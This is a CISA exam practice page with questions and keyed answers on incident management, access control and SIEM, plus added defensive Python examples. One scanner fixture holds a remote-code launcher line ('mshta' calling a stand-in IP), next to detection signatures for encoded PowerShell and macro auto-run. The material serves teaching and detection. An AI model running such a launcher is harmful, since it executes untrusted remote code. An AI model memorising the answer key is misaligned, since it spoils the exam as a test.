
ISACA CISA Certified Information Systems Auditor Exam Questions and Answers – 20

The latest ISACA CISA (Certified Information Systems Auditor) practice exam questions and answers (Q&A) are available free below to help you prepare for the ISACA CISA exam and earn the CISA certification.

ISACA Certified Information Systems Auditor (CISA) Exam Questions and Answers

CISA Question 2101

Question

Which of the following incident management practices would BEST facilitate rapid resolution and reduce downtime from unplanned interruptions?

A. Ensuring the service desk has access to catalogs of known errors
B. Ensuring IT systems are monitored on a continual basis
C. Ensuring incidents with unknown root causes are escalated
D. Ensuring the service desk is trained on issue resolution

Answer

B. Ensuring IT systems are monitored on a continual basis

CISA Question 2102

Question

After an employee termination, a network account was removed, but the application account remained active. To keep this issue from recurring, which of the following is the BEST recommendation?

A. Integrate application accounts with network single sign-on.
B. Perform periodic access reviews.
C. Leverage shared accounts for the application.
D. Retrain system administration staff.

Answer

A. Integrate application accounts with network single sign-on.
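The failure in this question is an application account that outlived its owner's network account. Integrating the application with single sign-on removes the second account to forget; until that is done, a periodic access review has to find the leftovers. The script below is an added example (not from the exam or from ISACA material) of such a review: it reconciles an application's local user table against the HR system as the source of truth and reports enabled accounts whose owner is gone. The record layout, the sample people and the 7-day grace period are constructed assumptions.

```python
"""Reconcile application accounts against the HR system of record.

Added example. Field names, sample records and the grace period are
constructed assumptions for illustration, not a real export format.
"""
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Dict, List, Optional

# Constructed HR export: the authoritative list of who still works here.
HR_RECORDS = [
    {"employee_id": "E100", "status": "active",     "term_date": None},
    {"employee_id": "E101", "status": "terminated", "term_date": "2024-03-01"},
    {"employee_id": "E102", "status": "terminated", "term_date": "2024-03-18"},
]

# Constructed export of the application's own user table.
APP_ACCOUNTS = [
    {"username": "alice",      "employee_id": "E100", "enabled": True},
    {"username": "bob",        "employee_id": "E101", "enabled": True},   # owner left, still enabled
    {"username": "carol",      "employee_id": "E102", "enabled": False},  # owner left, already disabled
    {"username": "svc_report", "employee_id": None,   "enabled": True},   # no owner in HR at all
]


@dataclass(frozen=True)
class Finding:
    username: str
    reason: str


def reconcile(app_accounts: List[dict], hr_records: List[dict],
              today: date, grace_days: int = 7) -> List[Finding]:
    """Return findings for enabled application accounts with no valid owner.

    'orphaned'         : the account maps to no HR record.
    'terminated owner' : the owner left more than grace_days ago and the
                         account is still enabled (the case in the question).
    Disabled accounts are skipped; the review is about live access.
    """
    hr_by_id: Dict[Optional[str], dict] = {r["employee_id"]: r for r in hr_records}
    findings: List[Finding] = []
    for acct in app_accounts:
        if not acct["enabled"]:
            continue
        owner = hr_by_id.get(acct["employee_id"])
        if owner is None:
            findings.append(Finding(acct["username"], "orphaned: no matching HR record"))
            continue
        if owner["status"] == "terminated":
            term = date.fromisoformat(owner["term_date"])
            if today - term > timedelta(days=grace_days):
                findings.append(Finding(
                    acct["username"],
                    f"terminated owner {owner['employee_id']} since {term.isoformat()}"))
    return findings


if __name__ == "__main__":
    for f in reconcile(APP_ACCOUNTS, HR_RECORDS, date(2024, 4, 1)):
        print(f"{f.username}: {f.reason}")
```

Run on a review date of 2024-04-01 the report names `bob` (terminated a month earlier, still enabled) and `svc_report` (no owner at all); `carol` is skipped because the account is already disabled. The grace period exists so that a termination processed yesterday is not reported as a control failure before the deprovisioning workflow has had a chance to run.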

CISA Question 2103

Question

Which of the following is the BEST way to mitigate the risk associated with a document storage application that has a syncing feature that could allow malware to spread to other machines in the network?

A. An audit should be conducted to detect shadow data and shadow IT in the network.
B. User behavior modeling and analysis should be performed to discover anomalies in user behavior.
C. Content inspection technologies should be used to scan files for sensitive data.
D. All files should be scanned when they are uploaded to and downloaded from the application.

Answer

D. All files should be scanned when they are uploaded to and downloaded from the application.
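The recommended control is to scan on both sides of the sync boundary, not only on upload. The sketch below is an added example (not from the exam or from any storage product) of why the download scan matters: a file that matched nothing when uploaded is caught on the way out after the signature set is updated, so it never reaches a second machine. The hash blocklist, the byte-pattern signatures and the sample files are constructed for the example; a real gateway would call a scanning engine fed by threat intelligence.

```python
"""Scan every file entering and leaving a document-storage sync gateway.

Added example. The blocked hash, the signatures and the sample files are
constructed; they stand in for a real scanning engine and intel feed.
"""
import hashlib
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple


@dataclass(frozen=True)
class ScanResult:
    allowed: bool
    reason: str


# Constructed "known bad" sample and its SHA-256; a real blocklist comes from threat intel.
KNOWN_BAD_PAYLOAD = b"MZ\x90\x00FAKE-DROPPER-SAMPLE"
BLOCKED_SHA256: Set[str] = {hashlib.sha256(KNOWN_BAD_PAYLOAD).hexdigest()}

# Constructed content signatures as (name, byte pattern) pairs.
SIGNATURES: List[Tuple[str, bytes]] = [
    ("office-macro-autoopen", b"Auto_Open"),
    ("encoded-powershell", b"powershell -enc"),
]


def scan_bytes(data: bytes, blocked: Set[str], signatures: List[Tuple[str, bytes]]) -> ScanResult:
    """Exact hash lookup first (cheap), then pattern signatures."""
    digest = hashlib.sha256(data).hexdigest()
    if digest in blocked:
        return ScanResult(False, f"hash match {digest[:12]}")
    for name, pattern in signatures:
        if pattern in data:
            return ScanResult(False, f"signature {name}")
    return ScanResult(True, "clean")


class SyncGateway:
    """Sits between sync clients and the store; nothing passes in or out unscanned."""

    def __init__(self, blocked: Set[str], signatures: List[Tuple[str, bytes]]):
        self.blocked = set(blocked)
        self.signatures = list(signatures)
        self._store: Dict[str, bytes] = {}
        self.quarantine: Dict[str, str] = {}

    def upload(self, name: str, data: bytes) -> ScanResult:
        result = scan_bytes(data, self.blocked, self.signatures)
        if result.allowed:
            self._store[name] = data
        else:
            self.quarantine[name] = result.reason
        return result

    def download(self, name: str) -> Tuple[ScanResult, Optional[bytes]]:
        # Re-scan on the way out: a file unknown at upload time may match a
        # signature added since, and the sync client must not receive it.
        data = self._store[name]
        result = scan_bytes(data, self.blocked, self.signatures)
        if not result.allowed:
            self.quarantine[name] = result.reason
            del self._store[name]
            return result, None
        return result, data


def demo() -> Dict[str, str]:
    """Walk four constructed files through the gateway; return what was quarantined."""
    gw = SyncGateway(BLOCKED_SHA256, SIGNATURES)
    gw.upload("q3-forecast.xlsx", b"PK\x03\x04 constructed clean workbook")
    gw.upload("setup.exe", KNOWN_BAD_PAYLOAD)                        # blocked: hash match
    gw.upload("invoice.docm", b"Sub Auto_Open() ... End Sub")         # blocked: signature
    gw.upload("notes.txt", b"run: mshta http://203.0.113.5/x.hta")    # unknown at upload, stored
    gw.signatures.append(("mshta-launcher", b"mshta http"))           # later intel update
    gw.download("notes.txt")                                           # caught on download
    return dict(gw.quarantine)
```

Without the download scan, `notes.txt` would sync to every device that subscribes to the folder the moment a client asks for it. The hash check is the cheap exact match; the signature pass is what catches variants, and it is the part that has to be refreshed, which is exactly why the egress scan cannot be skipped.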

CISA Question 2104

Question

Which of the following is an example of a corrective control?

A. Restoring system information from data backups
B. Utilizing processes that enforce segregation of duties
C. Generating automated batch job failure notifications
D. Employing only qualified personnel to execute tasks

Answer

A. Restoring system information from data backups

CISA Question 2105

Question

Which of the following is the BEST indication that an organization’s security information and event management (SIEM) capability is operating effectively?

A. Security event logging is centralized.
B. Security event logging policies are defined.
C. Security event logging is enabled for individual applications.
D. Security event logging is correlated across multiple applications.

Answer

D. Security event logging is correlated across multiple applications.
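Centralised logging (option A) puts the events in one place; correlation is what turns them into a detection. The rule below is an added example (not from the exam or from any SIEM product) of the difference: taken one application at a time, every event in the sample is routine, and only joining the VPN log with the HR application log by user and time raises an alert. The log format, field names, users, home country and 10-minute window are constructed assumptions.

```python
"""Correlate events from two applications in a centralised log store.

Added example. Log lines, field names and the rule's threshold are
constructed; they are not a real SIEM schema or vendor rule.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed, already-normalised events from two applications. Per application
# each line looks normal; the pair for jdoe is what the rule should find.
EVENTS = [
    "2024-05-02T08:01:10Z vpn   user=jdoe   action=login country=DE result=success",
    "2024-05-02T08:04:30Z hrapp user=jdoe   action=export_payroll",
    "2024-05-02T09:15:00Z vpn   user=asmith action=login country=US result=success",
    "2024-05-02T11:40:00Z hrapp user=asmith action=export_payroll",
    "2024-05-02T12:00:00Z vpn   user=bkim   action=login country=DE result=failure",
    "2024-05-02T12:02:00Z hrapp user=bkim   action=export_payroll",
]

HOME_COUNTRY = "US"                                           # constructed assumption
SENSITIVE_ACTIONS = {"export_payroll", "change_bank_details"}  # constructed assumption
WINDOW = timedelta(minutes=10)                                # constructed assumption


def parse(line: str) -> Dict[str, object]:
    """Split 'timestamp app k=v k=v ...' into a dict with parsed ts and app."""
    ts, app, *pairs = line.split()
    fields: Dict[str, object] = dict(p.split("=", 1) for p in pairs)
    fields["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    fields["app"] = app
    return fields


def correlate(lines: List[str], window: timedelta = WINDOW) -> List[Tuple[str, datetime, datetime, str]]:
    """Return (user, vpn_login_ts, hr_action_ts, country) for each successful
    VPN login from outside HOME_COUNTRY followed within `window` by a
    sensitive HR-application action by the same user."""
    events = sorted((parse(l) for l in lines), key=lambda e: e["ts"])
    foreign_logins = defaultdict(list)  # user -> [(ts, country)]
    alerts = []
    for e in events:
        if (e["app"] == "vpn" and e.get("result") == "success"
                and e.get("country") != HOME_COUNTRY):
            foreign_logins[e["user"]].append((e["ts"], e["country"]))
        elif e["app"] == "hrapp" and e.get("action") in SENSITIVE_ACTIONS:
            for login_ts, country in foreign_logins[e["user"]]:
                if timedelta(0) <= e["ts"] - login_ts <= window:
                    alerts.append((e["user"], login_ts, e["ts"], country))
    return alerts


if __name__ == "__main__":
    for user, login_ts, action_ts, country in correlate(EVENTS):
        print(f"ALERT {user}: VPN login from {country} at {login_ts:%H:%M:%S}, "
              f"payroll export at {action_ts:%H:%M:%S}")
```

On the sample, `asmith` is not flagged (home-country login), `bkim` is not flagged (the foreign login failed, so there is no session to abuse), and `jdoe` is flagged because a foreign login and a payroll export land within the window. An auditor testing effectiveness would ask for rules of this shape and evidence they fire, rather than only a screenshot showing both applications forwarding logs.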

CISA Question 2106

Question

Which of the following observations should be of MOST concern to an IS auditor evaluating an IT security team’s incident handling practices?

A. The team’s scope covers any nonstandard operation of IT services within the organization.
B. The prioritization of incidents is not done through a standardized process.
C. Defined acceptable ranges for incident resolution are not established.
D. Unresolved incidents are escalated based on criteria set by the organization’s CIO.

Answer

C. Defined acceptable ranges for incident resolution are not established.

CISA Question 2107

Question

An IT department is unaware of spreadsheets and databases that have been created by business end users to support their respective operations.
Which of the following is the GREATEST risk in this situation?

A. End-user solutions may not have proper documentation.
B. End-user developed systems may duplicate data.
C. End-user solutions may not be protected by IT general controls.
D. End-user developed systems may be inefficient.

Answer

C. End-user solutions may not be protected by IT general controls.

CISA Question 2108

Question

Using development and operations (DevOps) processes, an organization’s IT department has automated the process of replacing application programming interfaces (APIs) in production with new versions. Which of the following controls would BEST reduce the risk of vulnerabilities in this situation?

A. Review API change requests to ensure appropriate authorization exists
B. Conduct API security testing prior to release into production
C. Examine API log files to determine when changes occur in production
D. Review an up-to-date inventory of APIs in production for completeness

Answer

B. Conduct API security testing prior to release into production

CISA Question 2109

Question

An IS audit of help desk operations reveals that a number of similar issues have recently been reported to the help desk, but incident details have not been tracked. Which of the following is the MOST significant risk in this situation?

A. The help desk may not be meeting agreed-upon service levels.
B. The help desk may not be able to perform root cause analysis.
C. The help desk may lack resources to investigate incidents.
D. The help desk may not respond to incidents in a timely manner.

Answer

B. The help desk may not be able to perform root cause analysis.

CISA Question 2110

Question

An IS auditor notes that several recent incidents related to server overload were not anticipated early enough by IT operations to prevent outages.
Which of the following is the auditor’s BEST recommendation?

A. Update the IT operations balanced scorecard.
B. Improve training for IT operations personnel.
C. Re-evaluate key performance indicators (KPIs).
D. Purchase additional server hardware.

Answer

A. Update the IT operations balanced scorecard.